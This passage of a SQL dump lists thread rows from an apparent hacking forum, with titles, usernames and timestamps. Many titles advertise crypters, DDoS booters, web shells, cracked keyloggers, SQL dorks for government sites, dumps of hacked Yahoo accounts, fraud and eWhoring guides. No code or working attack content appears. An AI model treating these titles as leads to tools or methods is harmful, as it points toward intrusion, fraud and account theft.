[ The Ultimate Clickbank System ]', '0', '0', '0', '228', 'VirtualLegend', '1351368123', '6508', '1351387800', 'Apathy', '2', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1121', '20', 'JodMod Crypter 1/35 cracked', '0', '0', '0', '7', 'Romdu62', '1351390969', '6524', '1351738386', 'NXK', '61', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1122', '25', '[TuT]How To Speed Up Your Computer', '0', '0', '0', '7', 'Romdu62', '1351391118', '6526', '1351536738', 'XxTREYZxX', '257', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1123', '44', 'eWhoring Tactics; How to Change Writing on Pics', '0', '0', '0', '5', 'Timmy', '1351391351', '6527', '1351430954', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1128', '67', '[TuT] Creating a PM system', '0', '0', '0', '9', 'p420', '1351465127', '6562', '1351538278', 'XxTREYZxX', '257', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1124', '42', '22-Year-Old Girl Sells Her Virginity Online', '0', '0', '0', '264', 'D?ea', '1351440150', '6541', '1351725473', 'XxTREYZxX', '257', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1125', '42', 'Death by Monster energy drink', '0', '0', '0', '264', 'D?ea', '1351440285', '6542', '1351727773', 'NXK', '61', '22', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1126', '42', 'Facebook spent $715M on Instagram, $87M on other acquisitions this year', '0', '0', '0', '264', 'D?ea', '1351440704', '6543', '1351531211', 'Mac Miller', '302', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1127', '42', 'Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '0', '0', '264', 'D?ea', '1351440836', '6544', '1351653099', 'Timmy', '5', '23', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1129', '65', 'How do you watch your digital content', '0', '0', '0', '262', 'RAND0M1ZER', '1351476233', '6568', '1351476233', 'RAND0M1ZER', '262', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1130', '83', '[Videos] Dancing with girls [Text tips included]', '0', '0', '0', '4', 'Triple H', '1351480386', '6571', '1351481778', 'Triple H', '4', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1131', '83', '[Guide] Bagging whores in High School', '0', '0', '0', '4', 'Triple H', '1351481714', '6575', '1351481714', 'Triple H', '4', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1132', '83', '10 Rules for Dealing with Police', '0', '0', '0', '7', 'Romdu62', '1351481959', '6578', '1351481959', 'Romdu62', '7', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1133', '83', '[Tutorial] Cheating on tests', '0', '0', '0', '7', 'Romdu62', '1351482382', '6579', '1351749886', 'Timmy', '5', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1134', '35', 'My new pet', '0', '0', '0', '67', 'HoverCatz', '1351506665', '6584', '1351539730', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '1', '0'); INSERT INTO mybb_threads VALUES('1135', '4', 'Most Dope General in the building!', '0', '0', '0', '302', 'Mac Miller', '1351529743', '6593', '1351599788', 'Mac Miller', '302', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1137', '59', '[Ebook]Make $50+ a day usuing AdSense', '0', '0', '0', '302', 'Mac Miller', '1351541469', '6635', '1351541469', 'Mac Miller', '302', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1136', '47', 'C++ Tutorial Givaway', '0', '0', '0', '302', 'Mac Miller', '1351530887', '6597', '1351696689', 'VirtualLegend', '228', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1138', '42', 'Hurricane Sandy live updates and discussion', '0', '0', '0', '8', 'spacefish36', '1351552988', '6644', '1351634192', 'VirtualLegend', '228', '19', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1139', '83', '[tutorial] How to bully and get away in US', '0', '0', '0', '4', 'Triple H', '1351562475', '6657', '1351749971', 'Timmy', '5', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1143', '24', 'NEED HELP', '0', '0', '0', '257', 'XxTREYZxX', '1351643773', '6705', '1351743912', 'XxTREYZxX', '257', '20', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1140', '8', 'Who likes OFWGKTA?', '0', '0', '0', '302', 'Mac Miller', '1351599108', '6670', '1351698117', 'Mac Miller', '302', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1141', '4', 'Hi, I`m CommandoModz', '0', '0', '0', '306', 'CommandoModz', '1351613410', '6675', '1351686628', 'Mac Miller', '302', '11', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1142', '24', 'Fuck you Internet Explorer', '0', '0', '0', '1', 't3h jok3r', '1351620728', '6684', '1351735798', 't3h jok3r', '1', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1144', '11', 'What can you do with?', '0', '0', '0', '306', 'CommandoModz', '1351648215', '6706', '1352625357', 'sirchamp', '53', '28', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1145', '42', 'Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '0', '0', '5', 'Timmy', '1351651713', '6709', '1352427111', 't3h jok3r', '1', '42', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1146', '72', 'DO NOT BUY NFS Most Wanted', '0', '0', '0', '5', 'Timmy', '1351652654', '6710', '1351749562', 'Timmy', '5', '21', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1147', '9', 'BRAIN FREEZE - Moneymaking Method', '0', '0', '0', '7', 'Romdu62', '1351656958', '6716', '1351684291', 'VirtualLegend', '228', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1148', '30', '[Crack] Limitless Logger 6.7 !!', '0', '0', '0', '5', 'Timmy', '1351657206', '6718', '1351985446', 'NXK', '61', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1149', '20', '[AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '0', '0', '5', 'Timmy', '1351657530', '6722', '1352018424', 'luc1f3r.n008', '316', '19', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1150', '18', 'Facebook Creator', '0', '0', '0', '5', 'Timmy', '1351657787', '6726', '1351657845', 'XxTREYZxX', '257', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1151', '18', 'Instaflow [Instagram bot] [Gold Version]', '0', '0', '0', '9', 'p420', '1351657882', '6729', '1351657882', 'p420', '9', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1152', '21', 'Private Hard Hitting Shells', '0', '0', '0', '9', 'p420', '1351657971', '6730', '1351715286', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1155', '3', 'Happy Halloween', '0', '0', '0', '1', 't3h jok3r', '1351660263', '6738', '1351823062', 't3h jok3r', '1', '61', '17', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1153', '64', 'Watch Prison Break full online for free', '0', '0', '0', '9', 'p420', '1351658400', '6733', '1351749785', 'Timmy', '5', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1154', '43', 'Iphone 5 serials', '0', '0', '0', '9', 'p420', '1351658625', '6734', '1351808927', 'NXK', '61', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1156', '64', 'Walking dead', '0', '0', '0', '257', 'XxTREYZxX', '1351663300', '6743', '1351750256', 'Triple H', '4', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1157', '74', '[1.4.X] Minecraft Nodus Force Op [Direct Link][Not Patched 10/30/12]', '0', '0', '0', '257', 'XxTREYZxX', '1351663724', '6744', '1351663724', 'XxTREYZxX', '257', '3', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1158', '74', 'A few minecraft accounts that might work', '0', '0', '0', '257', 'XxTREYZxX', '1351664983', '6745', '1351802487', 'iTzIpod', '82', '15', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1159', '74', 'More minecraft acc that might work', '0', '0', '0', '257', 'XxTREYZxX', '1351665158', '6746', '1351884211', 'iTzIpod', '82', '20', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1163', '35', 'You Like it ? [ Rate My Graphic ]', '0', '0', '0', '228', 'VirtualLegend', '1351700732', '6768', '1351769682', 'iTzIpod', '82', '16', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1160', '9', '? Ebay Gold Digger System ? [ Highly Recommended ]', '0', '0', '0', '228', 'VirtualLegend', '1351692573', '6757', '1351692573', 'VirtualLegend', '228', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1161', '65', '????? YIFY Torrents ?????', '0', '0', '0', '228', 'VirtualLegend', '1351693111', '6758', '1351693111', 'VirtualLegend', '228', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1162', '12', 'Rank your YouTube videos to Number #1', '0', '0', '0', '228', 'VirtualLegend', '1351696998', '6764', '1351696998', 'VirtualLegend', '228', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1164', '11', 'RAT Help', '0', '0', '0', '160', 'Jacob', '1351737883', '6811', '1352227755', 'Jacob', '160', '25', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1165', '7', 'I m Back on LH:)', '0', '0', '0', '54', 'Sin Cara', '1351744218', '6820', '1352195571', 'Romdu62', '7', '55', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1169', '3', 'Computing Tab Forum Suggestions', '0', '0', '0', '1', 't3h jok3r', '1351750138', '6836', '1352536047', 'Romdu62', '7', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1177', '43', 'Free itunes/app store gift cards crack', '0', '0', '0', '5', 'Timmy', '1351835023', '6905', '1352196031', 't3h jok3r', '1', '19', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1166', '46', '[Guide] Reporting Phishing Pages', '0', '0', '0', '1', 't3h jok3r', '1351748936', '6824', '1351917769', 't3h jok3r', '1', '10', '3', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1167', '75', 'Batman Arkham City Cheats', '0', '0', '0', '5', 'Timmy', '1351749505', '6826', '1352530472', 'Timmy', '5', '5', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1168', '73', 'Temple Run or Subway Surfer?', '0', '0', '0', '5', 'Timmy', '1351749623', '6828', '1352230724', 'VirtualLegend', '228', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1170', '63', 'Need a sig', '0', '0', '0', '4', 'Triple H', '1351750388', '6839', '1352603954', 't3h jok3r', '1', '25', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1171', '33', 'Anyone have photoshop cracked?', '0', '0', '0', '4', 'Triple H', '1351750472', '6840', '1352598257', 'iTzIpod', '82', '38', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1172', '83', '[tut]How to knock someone out[/video]', '0', '0', '0', '4', 'Triple H', '1351751050', '6843', '1351897157', 'VirtualLegend', '228', '19', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1173', '5', 'Request for LH staff', '0', '0', '0', '1', 't3h jok3r', '1351757796', '6846', '1352195911', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1174', '47', '?? Untraceable PayPal + Never Get Limited Again + PP Secret ??', '0', '0', '0', '228', 'VirtualLegend', '1351791040', '6866', '1351799504', 'XxTREYZxX', '257', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1175', '4', 'Me:3', '0', '0', '0', '265', 'Ryan', '1351792445', '6869', '1351891893', 'VirtualLegend', '228', '24', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1176', '47', 'Free .asia domain', '0', '0', '0', '84', 'Thunder™', '1351792454', '6870', '1352013443', 'Thunder™', '84', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1178', '35', 'My new Siggy', '0', '0', '0', '257', 'XxTREYZxX', '1351853769', '6915', '1351892282', 'XxTREYZxX', '257', '13', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1179', '4', 'LSD is here', '0', '0', '0', '313', 'LSD', '1351876624', '6920', '1352000493', 'RAND0M1ZER', '262', '17', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1180', '16', 'What is Social Engineering?', '0', '0', '0', '82', 'iTzIpod', '1351894475', '6938', '1351949563', 'iTzIpod', '82', '13', '2', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1188', '35', '[Crack] Adobe CS6 Programs', '0', '0', '0', '9', 'p420', '1352007007', '6999', '1352257694', 'Timmy', '5', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1181', '7', 'Who wants Jok3rs private DDoSing method', '0', '0', '0', '5', 'Timmy', '1351916878', '6946', '1352195245', 'Timmy', '5', '46', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1182', '3', 'Can we report dead links?', '0', '0', '0', '5', 'Timmy', '1351917356', '6951', '1351960948', 'NXK', '61', '13', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1183', '46', '[TUT] Getting Images from index', '0', '0', '0', '4', 'Triple H', '1351918452', '6956', '1352186345', 'p420', '9', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1184', '67', 'Making an IRC based shell booter', '0', '0', '0', '4', 'Triple H', '1351918794', '6957', '1351918794', 'Triple H', '4', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1185', '13', 'SQL Dorks for .gov', '0', '0', '0', '4', 'Triple H', '1351918923', '6959', '1351918923', 'Triple H', '4', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1186', '68', '[HTML]Designing a Deface page', '0', '0', '0', '4', 'Triple H', '1351919107', '6960', '1351919107', 'Triple H', '4', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1187', '7', 'L33T Hacking keywords', '0', '0', '0', '8', 'spacefish36', '1351922442', '6961', '1352046612', 'NXK', '61', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1189', '15', '?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '0', '0', '9', 'p420', '1352007238', '7000', '1352046845', 'Apathy', '2', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1190', '3', 'New Rule', '0', '0', '0', '1', 't3h jok3r', '1352010460', '7004', '1352293091', 'NXK', '61', '82', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1191', '54', '[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012', '0', '0', '0', '255', 'sbhshroy2', '1352024025', '7014', '1352024025', 'sbhshroy2', '255', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1192', '3', 'Name error', '0', '0', '0', '53', 'sirchamp', '1352142728', '7037', '1352180291', 't3h jok3r', '1', '28', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1204', '3', 'We are L33T', '0', '0', '0', '1', 't3h jok3r', '1352195855', '7084', '1352372370', 'VirtualLegend', '228', '52', '12', '', '0', '0', '0', '', '1', '0', '1', '0'); INSERT INTO mybb_threads VALUES('1194', '4', 'moruzaks in the building', '0', '0', '0', '323', 'moruzaks', '1352161212', '7042', '1352206697', 'iTzIpod', '82', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1195', '47', 'Premium Minecraft Accounts', '0', '0', '0', '324', 'Purps™', '1352172410', '7045', '1352315328', 'VirtualLegend', '228', '65', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1196', '7', 'Your favorite time of the year?', '0', '0', '0', '205', 'mothered', '1352176330', '7048', '1352263500', 'mothered', '205', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1197', '4', 'Perfection', '0', '0', '0', '325', 'Perfection', '1352177312', '7050', '1352248960', 'XxTREYZxX', '257', '25', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1198', '64', 'Skyfall (2012) Movie RIP', '0', '0', '0', '9', 'p420', '1352183780', '7061', '1352183780', 'p420', '9', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1199', '64', 'Silent Hill: Revelation 3D (2012) Movie RIP', '0', '0', '0', '9', 'p420', '1352185232', '7062', '1352185232', 'p420', '9', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1200', '65', '[Review] Skyfall 2012', '0', '0', '0', '9', 'p420', '1352185360', '7063', '1352185360', 'p420', '9', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1201', '64', 'Sinister Movie Rip', '0', '0', '0', '9', 'p420', '1352186162', '7064', '1352519425', 'Triple H', '4', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1202', '34', '???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '0', '0', '62', 'R?????zo?', '1352193031', '7071', '1352236038', 'Apathy', '2', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1203', '21', 'Jok3r Manual DoSing sites method', '0', '0', '0', '5', 'Timmy', '1352195123', '7073', '1352371915', 'VirtualLegend', '228', '33', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1205', '43', 'Barcodes Truth', '0', '0', '0', '8', 'spacefish36', '1352196194', '7087', '1352196194', 'spacefish36', '8', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1206', '35', 'Sexy Girls Cool Wallpapers 1920 X 1200', '0', '0', '0', '62', 'R?????zo?', '1352199201', '7088', '1352254157', 'R?????zo?', '62', '14', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1207', '35', 'Rate these logos', '0', '0', '0', '82', 'iTzIpod', '1352242352', '7133', '1352418842', 'iTzIpod', '82', '19', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1208', '9', 'Steady $8 a Day [EXPLOIT]', '0', '0', '0', '5', 'Timmy', '1352257163', '7166', '1352557552', 'XxTREYZxX', '257', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1209', '15', 'WinRAR cracked', '0', '0', '0', '5', 'Timmy', '1352257356', '7167', '1352534038', 't3h jok3r', '1', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1210', '21', '[Cracked] Dark DDoSer', '0', '0', '0', '5', 'Timmy', '1352257552', '7168', '1352257552', 'Timmy', '5', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1211', '18', 'Facebook Blaster Pro v10.0', '0', '0', '0', '5', 'Timmy', '1352257874', '7170', '1352526819', 'p420', '9', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1212', '30', 'Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '0', '0', '5', 'Timmy', '1352258194', '7171', '1352314462', 'sirchamp', '53', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1213', '34', 'Black Sleek Thread Design .PSD', '0', '0', '0', '9', 'p420', '1352258497', '7173', '1352594009', 'XxTREYZxX', '257', '23', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1214', '43', 'Tons of PIDs', '0', '0', '0', '9', 'p420', '1352258706', '7174', '1352322172', 'VirtualLegend', '228', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1215', '3', 'Post/PM Allowed for ACCOUNTS Only.', '0', '0', '0', '61', 'NXK', '1352258731', '7175', '1352393452', 't3h jok3r', '1', '37', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1216', '52', '[Release]Skype Resolver & GeoIP', '0', '0', '0', '9', 'p420', '1352259453', '7177', '1352290301', 'iTzIpod', '82', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1217', '29', 'Win all paypal disputes!', '0', '0', '0', '1', 't3h jok3r', '1352259809', '7178', '1352321629', 'VirtualLegend', '228', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1218', '17', 'Camdecoy bitch available here', '0', '0', '0', '8', 'spacefish36', '1352260040', '7179', '1352476992', 'moruzaks', '323', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1219', '44', 'FIFA 13 Receipt', '0', '0', '0', '1', 't3h jok3r', '1352260181', '7180', '1352316618', 'XxTREYZxX', '257', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1220', '12', 'Big list Hacking tutorials with .txt', '0', '0', '0', '62', 'R?????zo?', '1352276913', '7193', '1352526732', 'PiXEL^OG', '258', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1221', '7', 'So Obama wins...', '0', '0', '0', '205', 'mothered', '1352289481', '7197', '1352328882', 't3h jok3r', '1', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1222', '13', '400,000 Hacked Yahoo Accounts Dumps', '0', '0', '0', '9', 'p420', '1352349546', '7232', '1352571980', 'Triple H', '4', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1223', '69', '[Release] IP Manager', '0', '0', '0', '9', 'p420', '1352349889', '7233', '1352349889', 'p420', '9', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1224', '68', 'Twitter Bootstrap Tutorial', '0', '0', '0', '9', 'p420', '1352350103', '7234', '1352350103', 'p420', '9', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1225', '25', '[Serials] Malwarebytes Full keys Dump', '0', '0', '0', '5', 'Timmy', '1352393640', '7249', '1352527686', 'spacefish36', '8', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1226', '30', 'Release Cracked - Youtube Booster Pro edition!', '0', '0', '0', '5', 'Timmy', '1352393844', '7250', '1352474295', 'sirchamp', '53', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1227', '4', 'Whaddup! <3', '0', '0', '0', '333', 'illest', '1352413588', '7254', '1352450845', 'XxTREYZxX', '257', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1228', '35', 'New banner!', '0', '0', '0', '333', 'illest', '1352414056', '7256', '1352518437', 'Triple H', '4', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1229', '49', 'Just a quick suggestion.', '0', '0', '0', '333', 'illest', '1352431355', '7270', '1352521504', 'mothered', '205', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1230', '49', 'great suggestion', '0', '19', '0', '257', 'XxTREYZxX', '1352451665', '7279', '1352537850', 'XxTREYZxX', '257', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1231', '15', '[link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '0', '0', '335', 'loser386', '1352452340', '7280', '1352500126', 'iTzIpod', '82', '11', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1232', '9', 'Adfoc.us Trick', '0', '0', '0', '53', 'sirchamp', '1352486031', '7289', '1352555401', 'bouabda', '341', '48', '10', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1233', '15', '[SALES] Sparky Java 2.0 | FUD Jar | 15 Domains | Addon:Skype Resolver| Booter', '0', '0', '0', '61', 'NXK', '1352491084', '7293', '1352491084', 'NXK', '61', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1234', '46', 'Did someone ever hack you through phishing?', '0', '0', '0', '4', 'Triple H', '1352517114', '7299', '1352635342', 'mothered', '205', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1235', '42', 'Marijuana legalized in two US states', '0', '0', '0', '5', 'Timmy', '1352521201', '7313', '1352619728', 'RAND0M1ZER', '262', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1236', '3', 'CloudFlare Issues?', '0', '0', '0', '205', 'mothered', '1352521789', '7317', '1352662590', 't3h jok3r', '1', '41', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1237', '61', 'Suggestion for this section', '0', '0', '0', '5', 'Timmy', '1352521857', '7318', '1352597444', 'iTzIpod', '82', '10', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1238', '67', 'Slowlowirs Shell .PHP file', '0', '0', '0', '5', 'Timmy', '1352523436', '7322', '1352523436', 'Timmy', '5', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1239', '84', '800 shells', '0', '0', '0', '5', 'Timmy', '1352524746', '7323', '1352524746', 'Timmy', '5', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1240', '81', 'Some private shells', '0', '0', '0', '1', 't3h jok3r', '1352524892', '7324', '1352524892', 't3h jok3r', '1', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1241', '35', 'New Userbars- Voting', '0', '0', '0', '1', 't3h jok3r', '1352525168', '7325', '1352594088', 'XxTREYZxX', '257', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1242', '34', 'Another thread design PSD', '0', '0', '0', '9', 'p420', '1352525738', '7327', '1352551639', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1243', '68', 'Simple Perl Booter', '0', '0', '0', '8', 'spacefish36', '1352527014', '7333', '1352527014', 'spacefish36', '8', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1244', '83', '[How to] Send a DMCA takedown notice', '0', '0', '0', '5', 'Timmy', '1352528646', '7338', '1352528646', 'Timmy', '5', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1245', '28', 'New Section Added in VIP tab', '0', '0', '0', '1', 't3h jok3r', '1352529862', '7340', '1352550776', 'iTzIpod', '82', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1246', '65', 'L33T 